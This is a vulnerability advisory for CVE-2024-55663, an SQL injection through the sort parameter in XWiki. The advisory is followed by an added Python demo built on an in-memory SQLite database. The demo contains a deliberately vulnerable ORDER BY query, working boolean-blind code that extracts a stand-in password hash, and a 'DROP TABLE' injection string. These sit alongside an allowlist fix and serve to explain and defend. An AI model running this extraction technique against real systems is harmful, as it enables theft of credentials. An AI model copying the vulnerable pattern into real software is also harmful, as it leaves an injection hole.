#VU125589 SQL injection in XWiki platform - CVE-2024-55663


Published: December 12, 2024 / Updated: April 9, 2026


Vulnerability identifier: #VU125589
Vulnerability risk: High
CVSSv4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/U:Amber
CVE-ID: CVE-2024-55663
CWE-ID: CWE-89
Exploitation vector: Remote access
Exploit availability: No public exploit available
Vulnerable software:
XWiki platform
Software vendor:
XWiki

Description

The vulnerability allows a remote attacker to disclose sensitive information and modify database contents.

The vulnerability exists due to insufficient sanitization of the request.sort parameter in getdocument.vm before it is used in a database query (SQL injection). A remote attacker can send a specially crafted request to disclose sensitive information and modify database contents.

Depending on the database backend, exploitation may allow reading confidential data such as password hashes and executing UPDATE, INSERT, or DELETE statements.
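The following is an added illustration of the vulnerability class described above (a user-controlled sort value spliced into ORDER BY), written in Python over an in-memory SQLite database. It is not XWiki's code, schema, or data: the table names, the `users`/`password_hash` stand-in for stored credentials, the `ALLOWED_SORT` map and all function names are assumptions made for the demo. It shows why an ORDER BY injection leaks data even though the query never selects from the sensitive table (the row order becomes a one-bit oracle), and the allowlist pattern that removes the problem. Whether stacked UPDATE/INSERT/DELETE statements also succeed depends on the backend, as the advisory notes; Python's sqlite3 `execute` refuses multi-statement strings, so that part is not demonstrated here.

```python
import sqlite3

# Constructed sample data for the demo; not XWiki's schema or data.
SAMPLE_DOCS = [("Help.Intro", "2024-03-01"),
               ("Main.WebHome", "2024-01-01"),
               ("Sandbox.WebHome", "2024-02-01")]
SAMPLE_USERS = [("admin", "ab12cd")]   # stands in for a stored password hash

# Allowlist for the hardened version: user-facing sort key -> real column name.
ALLOWED_SORT = {"name": "name", "date": "date"}


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE documents(name TEXT, date TEXT);"
        "CREATE TABLE users(login TEXT, password_hash TEXT);"
    )
    conn.executemany("INSERT INTO documents VALUES (?, ?)", SAMPLE_DOCS)
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def list_docs_vulnerable(conn, sort):
    """Vulnerable pattern: the request's sort value is concatenated into
    ORDER BY. Bind parameters cannot carry identifiers or expressions,
    which is why code like this ends up concatenating strings."""
    query = "SELECT name FROM documents ORDER BY " + sort
    return [row[0] for row in conn.execute(query)]


def list_docs_hardened(conn, sort):
    """Hardened pattern: only an allowlisted key is mapped to a column name;
    anything else is rejected before it can reach the query text."""
    column = ALLOWED_SORT.get(sort)
    if column is None:
        raise ValueError("unsupported sort key: %r" % sort)
    query = "SELECT name FROM documents ORDER BY " + column
    return [row[0] for row in conn.execute(query)]


def guess_hash_char(conn, position, candidates="0123456789abcdef"):
    """Attacker side: a CASE expression in ORDER BY makes the row order depend
    on a condition over the 'users' table, so each response reveals whether
    the guessed character is correct (boolean-based blind injection)."""
    for c in candidates:
        probe = ("CASE WHEN (SELECT substr(password_hash, %d, 1) FROM users) = '%s' "
                 "THEN name ELSE date END" % (position, c))
        if list_docs_vulnerable(conn, probe) == list_docs_vulnerable(conn, "name"):
            return c
    return None


def recover_hash(conn, length):
    """Recover 'length' characters of the stand-in hash one probe at a time."""
    return "".join(guess_hash_char(conn, i) or "?" for i in range(1, length + 1))


if __name__ == "__main__":
    db = build_db()
    print("normal sort:", list_docs_vulnerable(db, "name"))
    print("leaked via ORDER BY oracle:", recover_hash(db, 6))
    try:
        list_docs_hardened(db, "name; DROP TABLE users")
    except ValueError as err:
        print("hardened version rejected:", err)
```

The oracle only works because sorting by `name` and sorting by `date` yield different orders for the sample rows; a real attacker picks two columns with the same property. The hardened function never interpolates attacker input at all, which is the only reliable fix for identifiers and ORDER BY clauses, since escaping does not apply to them.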


Remediation

Install the security update from the vendor's website.

External links